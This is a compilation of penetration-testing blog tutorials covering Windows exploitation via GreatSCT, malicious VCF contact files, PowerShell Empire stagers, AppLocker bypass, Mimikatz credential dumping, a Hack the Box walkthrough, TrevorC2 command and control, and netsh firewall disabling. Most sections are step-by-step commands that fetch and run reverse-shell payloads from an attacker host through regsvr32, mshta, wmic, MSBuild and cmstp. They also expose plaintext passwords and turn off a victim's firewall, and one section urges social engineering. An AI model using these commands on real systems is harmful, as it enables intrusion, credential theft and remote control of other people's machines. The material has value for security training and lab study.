Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below

regsvr32 /u /n /s /i:http;//192.168.1.107/payload.sct

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious dll file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regasm/meterpreter/rev_tcp.py

Once the command is execute, type:

set lhost 192.168.1.107

generate

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .dll file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now place above generated dll file inside : C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\ and then  execute the .dll file in the run window of the victim’s PC as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Exploiting Windows PC using Malicious Contact VCF file

January 30, 2019, 7:54 am

≫ Next: Exploiting Windows using Contact File HTML Injection/RCE

≪ Previous: GreatSct - An Application Whitelist Bypass Tool

$

0

0

A huge shoutout to cyber security researcher John Page for bringing this vulnerability into the internet’s eye on 15^th January 2019. This was a 0 day exploit and of course works with the latest windows 10 too. It is categorized under “Insufficient UI warning remote code execution” vulnerability.

Introduction: Basically what John discovered was that if we replaced the website in a VCF file with the local path of a CPL file, it tends to install that file instead of opening it on browser. This is done by replacing the “http://” with “http.\\”, which is totally insane since a user would need the eyes of multi mega pixels to discover an intentional path error of that kind! So all we need to do is to send the victim that VCF file along with our CPL file in a folder named “http” (it has to be http only for local path inclusion) and we shall get a shell.

To read more about the research follow the link here.

Methodology:

1.      Making an msfvenom windows payload with .dll extension.

2.      Sending the dll file in a folder named “http”.

3.      Creating a contact file in the parent folder of “http”.

4.      Adding a website into the contact.

5.      Changing the prefix of website from http:// to http.\\

6.      Renaming the dll file to “.cpl”

7.      Running multi handler in a window

8.      Opening the website path from the contact

9.      Spawning shell.

Proof of Concept:

The first step would be to make a payload with a dll extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In this case my local IP address is 192.168.1.109.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll

Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else since we are including a path later on in the website link. And it has to be in the current directory too. So we copy this shell.dll file into the victim machine.

Next and the most important step is to make a contact VCF file. You can download a sample vcf too and add a website but we made a new contact file. The system we are using is windows 10 so the version of VCF file may differ from yours but it would work just the same.

Add any name in the contact file.

I added Raj Chandel.

Traverse to the next tab home and you’ll see a text box to input a website. Add any website’s name as you desire. I added my website’s name “hackingarticles.in” but here is the most important thing you have to note here:

A generic website’s link is http://www.hackingarticles.in but we modify the prefix just a little by replacing the http:// with http.\\

This is because we don’t actually want to include a website but we want to include a path to our DLL file so that when the victim click’s on the website, our DLL should run.

Here, we are suffixing the website link with “.cpl” extension. A CPL file is a control panel item, such as Displays, Mouse, Sound, or Networking, used by the Windows operating system.

Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”

Now we are prepped and ready to run the DLL file so we set up multi/handler on a terminal window and opened the contact on victim’s machine.

As soon as we click on the link here, we will see a session is obtained in the kali terminal!

This spawns a shell of the current user of windows that is logged on.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.

Exploiting Windows using Contact File HTML Injection/RCE

January 31, 2019, 10:54 pm

≫ Next: Jenkins Pentest Lab Setup

≪ Previous: Exploiting Windows PC using Malicious Contact VCF file

$

0

0

After the 0 day exploit on malicious VCF file in windows, cyber security researcher John Page deserves another round of applause for bringing this vulnerability onto exploit-db’s eye on 23^rdJanuary 2019. This vulnerability further exploits the RCE vulnerability present in VCF with HTML injections. To read the previous article follow the link here.

Introduction: The idea here is to include a malicious VBScript file into the email section of the VCF file so as to locally execute a script instead of opening the email via mailto. We’ll be using the anchor tag () of HTML to achieve the aforementioned task. This vulnerability is classified by John under “Mailto: HTML Link Injection Remote Code Execution”. To read more about the discovery and origin, follow the link here.

Methodology: 

·         Making an msfvenom payload of a .vbs format.

·         Sending the VBS file to victim.

·         Creating a VCF file in the parent folder.

·         Adding an email into the contact with HTML injection parameters.

·         Running multi/handler in a separate window.

·         Opening email in the VCF file.

·         Spawning meterpreter.

So, without any further ado, let’s dive right into it.

Proof of Concept:

The first step would be to make a payload with a vbs extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In my case, the local IP address is 192.168.1.109

Once the payload is made, transfer the .vbs file into victim’s PC.

Next and the most important step is to make a contact VCF file. You can download a sample VCF too and add a website but we made a new contact file. The system we are using is Windows 10 so the version of VCF file may differ from yours but it would work just the same. Once the contact file is made, under the e-mail tab, add the HTML injection like:

raj@gmail.com

Mind here that our parent folder’s name is “Raj” and the malicious VBS file is “shell.vbs”.

Now you’ll have to add this email address by clicking on the add button. As you can see it would look something like this:

Once the email address gets added, you’ll have to save the contact file. The final VCF file is going to look something like this:

By the aforementioned HTML injection tag, we are prompting a local inclusion instead of a mail prompt. This will run the malicious code and thereby, theoretically would spawn meterpreter. So, as soon as we add the mail in the VCF file, Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click yes.

When you click on the mail in the final processed VCF file, you’d probably have opened a new meterpreter session.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.

---

Jenkins Pentest Lab Setup

February 2, 2019, 4:11 am

≫ Next: Multiple Ways to Exploiting Windows PC suing PowerShell Empire

≪ Previous: Exploiting Windows using Contact File HTML Injection/RCE

$

0

0

You all know that we have performed so many ctf challenges and we got to know about jenkins there.so lets know about jenkins better. For this we are here with the new challenges which you will face peforming ctf challenges.to do it in a easier way we are here with a new article.so let’s do it.

Table of Content

Introduction of Jenkins

Lab setup

·         Install java

·         Import the GPG keys

·         Add the Jenkins repository

·         Install Jenkins

·         Setup Jenkins

Jenkins penetration testing

Exploiting Groovy Script

Introduction of Jenkins

Jenkins is an open source automation server written in Java that offers a simple way to set up a continuous CI / CD pipeline.  It supports version control tools,including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, TD/OMS, ClearCase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. The creator of Jenkins is Kohsuke Kawaguch. Jenkins achieves Continuous Integration with the help of plugins. Plugins allows the integration of Various DevOps stages. If you want to integrate a particular tool, you need to install the plugins for that tool. For example: Git, Maven 2 project, Amazon EC2, HTML publisher etc.

Lab setup

Install Java

Now we need to install Jenkins and for this it is mandatory that you are logged in from sudo user or root. Because Jenkins is a Java application, installing Java is the first step. Update the package index and install the OpenJDK Java 8 package using the following commands:

sudo apt update

sudo apt install openjdk-8-jdk

Import the GPG keys

wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -

Install Jenkins

When the key is added, the system returns all right. Next, add the Debian package repository to the source list of the server:

sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list'

sudo apt update

The Jenkins version with the default Ubuntu packages is often behind the project's latest version. You can use project-maintained packages to install Jenkins to take advantage of the latest fixes and features. Now open the kali terminal and install Jenkins from the given link below-

sudo apt install Jenkins

sudo ufw allow 8080

You can use its status command to check that Jenkins has successfully started.

systemctl status jenkins

Visit Jenkins on its default port 8080 to set up your installation using your server domain name or IP address: http:/your server ip or domain:8080

You should see the Unlock Jenkins screen displaying the location of the initial password:

In the terminal window, you need to use the cat command to display the password:

Copy the password from your terminal

sudo cat /var/lib/jenkins/secrets/initialAdminPassword

Copy the password from your terminal and paste it into the Administrator password field and click Continue.

On the next page, you will be asked if you want to install suggested plugins or if you want to select specific plugins. Click the Install suggested plugins box and start the process of installation plugin instantly.

In my case it took so much time to get all plugin installed successfully. 

Once the installation is completed, you will get another page to create First Admin user account, fill the all essential details and click on “Save and Continue”.

You will see a confirmation page that "Jenkins is ready”. To visit Jenkins main dashboard, click Start using Jenkins Click Save and Finish after confirming the corresponding information.

That’s wonderful! You have successfully installed Jenkins on your system.

Multiple Ways to Exploiting Windows PC suing PowerShell Empire

February 4, 2019, 8:55 am

≫ Next: Bypass Application Whitelisting using Weak Path Rule

≪ Previous: Jenkins Pentest Lab Setup

$

0

0

This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here.

Table of content:

·         Exploiting through HTA

·         Exploiting through MSBuild.exe

·         Exploiting through regsvr32

·         XSL exploit

·         Exploiting through visual basic script

·         BAT exploit

·         Multi_launcher exploit

Exploiting through HTA

This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here.

To run type ‘./Empire’.

According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command:

listeners

After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.  So in this listener interface, type :

uselistener http

set Host http://192.168.1.107

execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type :

usestager windows/hta

set Listener http

set OutFile /root/1.hta

execute

Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file:

python -m SimpleHTTPServer 8080

As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file:

mshta.exe http:/192.168.1.107:8080/1.hta

The moment above command is executed you will have your session, to access the session type :

interact XDGM6HLE

sysinfo

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type:

listeners

uselistener http

set Host http:/192.168.1.107

execute

This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type :

usestager windows/launcher_xml

set Listener http

execute

Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\

MSBuild.exe launcher.xml

So, this way you will have your session, to access the said session type :

interact A8H14C7L

sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command:

listeners

uselistener http

set Host http://192.168.1.107

execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type:

usestager windows/launcher_sct

set Listener http

execute

This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command:

regsvr/u/n/s/i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus, you will have an active session. To access the session type:

interact

sysinfo

Exploiting through XSL

XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file.  For this method lets activate our listener first by typing :

listeners

uselistener http

set Host http://192.168.1.107

execute

As the listener is up and running, create your exploit :

usestager windows/launcher_xsl

set Listener http

execute

This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below :

cd /tmp

python -m SimpleHTTPServer 8080

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:”http://192.168.1.107:8080/launcher.xsl”

Running above will give a session, to access the session type :

interact

sysinfo

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first.

listeners

uselistener http

set Host http://192.168.1.107

execute

Now, to create our malicious .vbs file type :

usestager windows/launcher_vbs

set Listener http

execute

Next step is to start the python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type :

interact

sysinfo

Exploiting through .bat

In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type:

listeners

uselistener http

set Host http://192.168.1.107

execute

back

The above commands will create a listener for you. Let’s create our .bat file using following command :

usestager windows/launcher_bat

use Listener http

set OutFile /root/1.bat

execute

As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc.

python -m SimpleHTTPServer 8080

Once you run the .bat file, a session will activate. To access the session type:

interact

sysinfo

Multi_launcher

This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener:

listerners

uselistener http

set Host http://192.168.1.107

execute

Then type following commands for create your malicious file:

 usestager multi/launcher

set listerner http

execute

Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type:

interact

sysinfo

Conclusion

The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

Bypass Application Whitelisting using Weak Path Rule

February 5, 2019, 7:54 pm

≫ Next: Pentesting on wdgiest with Mimikatz

≪ Previous: Multiple Ways to Exploiting Windows PC suing PowerShell Empire

$

0

0

Finding loopholes is very important when you are the part of a pen-testing team. Because such loopholes are the source of hacking as the attacker will actively look for them. So in order to patch such loopholes, you must know how to and where to find them. One of such loopholes is something known as weak folders in windows.

To secure windows, there are multiple security policies provided by Microsoft. One of such policies does not allow an exe file to execute which means a malicious exe file that can be sent by an attacker will not work in the targeted PC. To apply such policy, you need to go into the local security policy of windows > Applocker > executable rules > and then apply the policy. As you can see in the image below the default rule has been set.

Now, if you try to run any given .exe file, it will not run. Here, I have tried to execute putty.exe file but as you can see in the image below it does not run.

The loophole to this policy is that there still few folders, which despite of activated security policies, has write and read permission and such files will execute from these folders. If I run the same exe i.e. putty.exe in the C drive > windows > tasks folder then it will be executed as shown in the image below.

To check which folders have read and write permission, you can use the following command:

accesschk64.exe “Users” c:/Windows -w

using this command, you can see in the following image that everywhere the access is denied except for the temp, task and tracing folders.

Now let’s experiment with a malware which we will create using msfvenom for the targeted PC with the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

When you execute the above malware in the victims’ PC, it will not run due to the applicable security policies.

But, if using the loophole, you execute the file from the tasks folder as shown in the image below:

Then, you will have your meterpreter session as desired.

So, while providing security or attacking you must know everything about the targeted machine so that you can use their security against them or provide even better security by patching such loopholes.

Pentesting on wdgiest with Mimikatz

February 14, 2019, 8:58 am

≫ Next: Pentest Lab Setup on Memcached

≪ Previous: Bypass Application Whitelisting using Weak Path Rule

$

0

0

In this article we will show you the methods of protecting your system against MIMIKATZ that fetches password in clear text from wdigest. As you know the Pen-tester and red team uses mimikatz for testing password capacity. For the complete information how mimikatz works visit this link:

https://www.hackingarticles.in/understanding-guide-mimikatz/

Table of Contents

§  Introduction

o   System impacted

§  Demonstration on Windows 7

o   Disable WDigest (defending against mimikatz)

§  Demonstration on Windows 10

o   Enable WDigest in Windows 10

o   Enable Widgest via registry key

Introduction of WDigest

WDigest.dll was introduced in the Windows XP operating system. in Windows XP, Microsoft added a support for a protocol known as WDigest. The WDigest protocol is used for clients to send clear text credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. When the WDigest authentication protocol is enabled, clear text password is stored, where it can be at risk of theft.

System Impacted

The problem with WDigest is that it stores passwords in memory in clear-text and it can be extracted by using MIMIKATZ. The following OS’s are impacted: Windows 7, Windows 8, Windows 8.1, Windows Server 2008, Windows Server 2008R2, and Windows Server 2012.

Demonstration on windows 7

An attacker with administrator privileges can steal credentials from damaged system memory. Memory credentials are stored in plain text and in various hash formats. First we will demonstrate how we can see the password of Windows 7 using MIMIKATZ tool as shown in the image below as it has shown the password in the clear text. And for this we will following commands in MIMIKATZ tool

privilege::debug

sekurlsa::wdigest

Now as you can observe that is has shown you the password in clear text. We can also do this by taking the meterpreter of the target system and then using MIMIKATZ in Kali. Here you will see that it has also shown us the password of the compromised system.

Disable WDigest (Defending against mimikatz)

Now as we know that it is a security threat; so now we will get to know how we can remove this from our system and for this a registry change is required to make to hide our password. For this we will first open the regedit and then go to WDigest option using the following path

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest

Here you need to open the security packages and you will see WDigest with the other options as shown in image below

Great! You have found that. Now simply you need to remove Wdigest from here so that nobody can see the password using MIMIKATZ tool.

Now after making these changes we need to update the group policy and reboot the system. After doing so we will again use MIMIKATZ tool to see the change now. So we will use the same commands which we have used earlier to get the password and this time it will show us the password NULL as show in the image.

Great! We have successfully hidden the password. Now if somebody has taken the meterpreter of the Windows 7 and if the attacker tries this in kali using MIMIKATZ tool there. Even then the attacker is not able to get the password of the compromised system as shown in the image below

Demonstation on Windows 10

In the same way we will try this method in Windows 10 and as we know that in Windows 10 it is disabled by default. We can verify this by using the MIMIKATZ tool there.

Enable WDigest in Windows 10

Yes; as we have verified that the Wdigest option is disabled by default. Now we will learn how we can enable Wdigest in Windows 10. For this first we need to take meterpreter of the target system and then we need to take the admin access of the system and then we need to use the exploit to enable Wdigest in the target system with the help of following module.

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.

use post/windows/manage/wdigest_caching

msf post(windows/manage/wdigest_caching) > set session 2

msf post(windows/manage/wdigest_caching) > exploit

After making the changes we will check if the Wdigest option is enabled. For this we will again use MIMIKATZ tool here and we will observe that we have found the password of the victim’s P.C

We can do this too by taking the meterpreter of the system using MIMIKATZ tool there.

Enable Widgest via registry key

There is one more way to see the password. The second method to enable WDigest is by taking the shell of the compromised system. Now run the following command to enable the wdigest.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

After you get the shell; you need to run Mimikatz tool here and we will use the same commands to see the password. And you will observe that we have got the password.

Excellent we have done this with this method also. And we know that how to see the password in Windows 10 and how to enable and disable that.

Pentest Lab Setup on Memcached

February 15, 2019, 9:49 pm

≫ Next: Hack the Box: Ypuffy Walkthrough

≪ Previous: Pentesting on wdgiest with Mimikatz

$

0

0

In this article, we are going to learn about pen-testing in Memcached lab setup in Ubuntu 18.04. Memcached server is used by corporations in order to increase the speed of their network as it helps to store frequently used data. This helps to take offload of the hardware and decrease the time taken.

Table of contents

·        Introduction to Memcached.

·        Memcached installation.

·        Memcached configuration.

Introduction to Memcached

Memcached is a distributed memory object caching system. It's an open source and without any cost tool. It is used to speed up web applications by using a database from the cache memory. It is an in-memory key-value store for little bits of self-assertive information (strings, objects) that is extracted from database calls, API calls, or page rendering. Memcached is basic however capable of advancing speed arrangement, ease of advancement, and understands numerous issues confronting expansive information caches. Its API is accessible for most prevalent languages.

Memcached installation                                                                             

To install, boot up your Ubuntu machine and open the terminal.

Note: Apache2 should be installed before installing Memcached. You can easily install Apache2 by just typing in a simple command.

apt install apache2

Now that we are all done, let’s setup Memcached by typing the commands shown below.

apt install memcached

After installing Memcached add ppa:ondrej/php PPA in your Ubuntu system’s repository to download

and install the latest version of PHP available. Follow the commands as shown below.

add-apt-repository ppa:ondrej/php

After adding the repository, update the system by typing in the following command.

apt update

Now, install PHP by executing the command shown below :

apt install –y php php-dev php-pear libapache2-mod-php

Now that PHP has been installed successfully in our system, we will go ahead and install the PHP Memcached module by executing the below command:

apt install -y php-memcached

Once the installation is complete, restart the Apache2 service.

service apache2 restart

Now check whether the PHP extension is working fine or not by creating a info.php by using the code mentioned below with nano or any text editor you like.

  phpinfo();

?>

Now save the file in /var/www/html

Once the file is saved, access it from your web browser by typing in the following URL.

localhost/info.php

You should see the results as shown in the image below.

Memcached Configuration

Now, here we are going to configure the Memcached Server. To do so, we have to edit its configuration file. You will find this configuration file through /etc/memcached.conf path. Open the memcached.conf file using nano or any other text editor. The commands that are shown below will be given and activated by default. The purpose of this mentioning is to let you know that where you can find it; along with why and how to make changes to it., if necessary. Following are the said commands which are important for low-level Memcached Server configuration:

-m 64

Here,

-m: specifies the maximum memory limit which is used by Memcached daemon. By default, this limit is 64 MB

-p 11211

Here,

-p: specifies the port number. By default, it’s 11211.

-u memcache

Here,

-u: starts the daemon tool as root.

After this, uncomment “-l 127.0.0.1” by simply adding # as shown in the image, as it will not be so by default. By uncommenting, it will stop binding the IP address of Memcached listener to the loopback IP. Hence, traffic can come from any IP over the internet.

Now once you saved the configuration file after making the changes, restart the service by using the following command :

service memcached restart

Then use the following command to confirm whether Memcached configurations are working are not :

ss -tnl

Once you are done with the above commands, connect Memcached through telnet and do a version check by typing in “version” command:

telnet localhost 11211

version

Now, you can use nmap to check if the Memcached service is running on the server.

nmap -sV -p- 192.168.1.32

Conclusion

To conclude, we can say that Memcached is a basic caching system. It uses expiration timeouts i.e. if the server has no memory left, it will evict items to replace them with the new ones. The items it chooses to replace are the ones which have been not requested for a long period of time. And so, in the above article, we have provided a basic guide to setup the Memcached penetration testing lab.

Hack the Box: Ypuffy Walkthrough

February 16, 2019, 1:06 am

≫ Next: Bypass Application Whitelisting using cmstp

≪ Previous: Pentest Lab Setup on Memcached

$

0

0

Today we are going to solve another CTF challenge “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Ypuffy is 10.10.10.107

Penetrating Methodology

·        Network scanning (Nmap)
·        Scanning port 389 using LDAP script
·        Fetching shared directory using smbclient and finding private key
·        Connecting to VM with SSH using private key
·        Enumerating files with SUID bit set
·        Discovering that alice1978 can run ssh-keygen as userca
·        Discovering authorized commands at ssh login
·        Fetching principal using curl command
·        Enumerating public certificate in system
·        Signing RSA key with ca certificate using doas command and previously found principal
·        Logging into ssh using new private key pair
·        Snagging the flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV -sC 10.10.10.107

The nmap scan shows us that there are 5 ports open: 22(SSH), 80(HTTP), 139(SMB), 389(LDAP), 445(SMB)

As LDAP service is running on port 389, we use nmap script called “ldap-search” to enumerate the target machine and we find the password hash for user “alice1978”.

nmap -389 --script=ldap-search 10.10.10.107

Now as we find the password hash and username, we can login through using SMB using smbclient.

First we check the shared directory available on the target machine and find a directory called “alice”. We then access the shared directory and find a file called “my_private_key.ppk”, we download the file to our local system.

smbclient –L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash

smbclient \\\\10.10.10.107\\alice -U alice1978% --pw-nt-hash

The file we downloaded was a “Putty Private Key” file, so we use puttygen to convert the file into RSA private key. After converting it into RSA key, we change the permission of the rsa key and use it to login through SSH.

puttygen my_private_key.ppk -O private-openssh -o id_rsa

chmod 600 id_rsa

ssh -i id_rsa alice1978@10.10.10.107

After logging in through SSH, we find a file called “user.txt”. We take a look at the contents of the file and find the first flag.

Now we check the files with suid bit enabled and find that “doas” is available on the target machine. It is a command utility similar to “sudo” command. Now we check “/etc/doas.conf” to find what commands we can run. We find that we can run “/usr/bin/ssh-keygen” as user “userca”.

find / -perm -4000 2>/dev/null

cat /etc/doas.conf

To further enumerate the target machine, we use open the ssh configuration file at “/etc/ssh/sshd_config” and find we can run the command “/usr/bin/curl http://127.0.0.1/sshauth?type=key&username=%u” and “/usr/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u”.  

Further enumerating the web application, we find that we can request keys from “http://127.0.0.1/sshauth?type=key&username=%u” and principals from “http://127.0.0.1/sshauth?type=principals&username=%u”, we requested keys for root user and get no response but we are successfully able to get root user’s principal.

curl “http://127.0.0.1/sshauth?type=key&username=root”

curl “http://127.0.0.1/sshauth?type=principals&username=root”

As we have the root user’s principal, we can generate SSH keys and sign them with root’s principal. Doing so will allow us to login through SSH as root. Now we know we can run ssh-keygen to generate SSH keys but first we need certificate to sign the SSH key. We enumerate the machine to find a certificate and find one inside /home/userca directory.

First we generate SSH keys and move them into the /tmp directory. Then we sign the keys as userca to read the certificate inside /home/userca/ca.

ssh-keygen

mv .ssh/id_rsa* /tmp/

doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgency84ckd00r -I root /tmp/id_rsa.pub

After signing the RSA keys, we use the RSA key to login through SSH as root user. After logging in we find a file called “root.txt”. We take a look inside the content of the file and find the final flag.

ssh -i /tmp/id_rsa root@localhost

Bypass Application Whitelisting using cmstp

February 16, 2019, 8:51 am

≫ Next: TrevorC2 - Command and Control

≪ Previous: Hack the Box: Ypuffy Walkthrough

$

0

0

By default, Applocker allows the executing of binaries in the folder that is the major reason that it can be bypassed. It has been found that such binaries can easily be used in order to bypass Applocker along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP welcomes INF files and so exploitation through INF is possible. And so, we will be learning how to perform such exploitation.

As we all know CMSTP accepts SCT files and runs then without suspicion and therefore we will create a malicious SCT file to reach our goal.  We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click here.

Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :

listeners

uselistener http

set Host 192.168.1.109

execute

Above commands will create a listener for you, then type back to return from listener interface and as for the creation of SCT file type :

usestager windows/launcher_sct

set Listener HTTP

execute

Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.

Download this script from here:

Now, send the file to the victim’s PC and run the following command in victims’ command prompt :

cmstp.exe /s shell.inf

As soon as you run the command, you will have a session. Use the following command to access your session :

interact

This way, you can use CMSTP binary to bypass applocker restrictions. CMSTP needs an INF file and by using it to your advantage you can have access to victim’s PC.

---

TrevorC2 - Command and Control

February 16, 2019, 11:25 pm

≫ Next: Firewall Penetration Testing in Remote Windows PC (netsh Tutorial)

≪ Previous: Bypass Application Whitelisting using cmstp

$

0

0

TrevorC2 is command and control framework. It is client/server model which works through a browser masquerading as C2 tool. It works on different time intervals which makes it almost impossible to be detected. This tool is coded in python but it’s also compatible with c#, PowerShell, or any other platform. this is supported by both windows and MacOS along with Linux. It is very easy and convenient to use.

You can download it from: https://github.com/trustedsec/trevorc2

Once its downloaded, open the folder and then open trevorc2_server.py file and change the IP to your local host IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.

Then, start and run trevorc2 framework.

Once the trevorc2 is up and running, change the IP to your local host IP in trevorcs.ps1file.

Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :

To see the sessions type :

list

And to access this session type :

interact

Firewall Penetration Testing in Remote Windows PC (netsh Tutorial)

February 17, 2019, 1:11 am

≫ Next: Hack the Box: Dab Walkthrough

≪ Previous: TrevorC2 - Command and Control

$

0

0

Firewall is a network security system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in varied modes i.e. hardware, software, or a combination of both. There are many types of firewall such as Proxy firewall, Application Firewall, Stateful firewall, Packet firewall, etc.

Firewalls are connected to the network and are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets ensuring security. All messages entering into or leaving the intranet pass through a firewall, which examines each message and block those which do not meet the specified security criteria.

 Firewall is functional on two rules which are always encircled by Inbound and outbound rules:

Inbound rules: These are the ones which filter traffic passing from the network to the local computer based on the filtering conditions specified in the rule.

Outbound rules: These are the ones which filter traffic passing from the local computer to the network based on the filtering conditions specified in the rule.

Both inbound and outbound rules can be configured to allow or block traffic as needed.

In other words, we can say that Inbound rules are to do with other things accessing your computer. If you are running a Web Server on your computer then you will have to tell the Firewall that outsiders are allowed to connect to it. Further Outbound rules categorize some programs to use the Internet yet block others. You will want to let your Web Browser (Internet Explorer, Firefox, Safari, Chrome, Opera...) have accessibility to the Internet, so a command can be inserted which displays that Windows Firewall is allowed.

Now let us assume that the firewall of the victim's PC is enabled:

So to turn off the firewall of victim's PC, first of all, get a session through meterpreter and then take the administrator privileges of the remote PC. Move on to the shell of remote PC and write

netsh firewall set opmode mode=disable to turn off the firewall of remote PC.

And like this, the firewall of remote PC will be disabled.

How to Block Website in Remote PC:

We can not only turn off or on the firewall through Metasploit but we can also block and allow access to any particular port. Yes, that means we can control Inbound and Outbound rules as well. Again after having the session through meterpreter and bypassing administrative privileges and going to the shell of the remote PC just type

netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80 action=block

Here,

Name = The name of the rule. (Pick something descriptive)

Protocol = The protocol we are going to block (UDP or TCP for most cases)

Dir = The direction of the block. Can be IN or OUT

Remote Port = The port of the remote host that is going to be blocked

Action = Could be block or allow. In our case we want to block the connection

Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:

And if you check its properties and click on 'Protocols and Ports' tab then you can see the result.

How to Block Multiple Ports

Now that we have how to block a port in remote PC, let us dig a little deeper i.e we can not only block one port but also two or more than two. And to block two to more port again take a meterpreter session as well as administrator privileges of the remote PC and just write

netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80,443 action=block

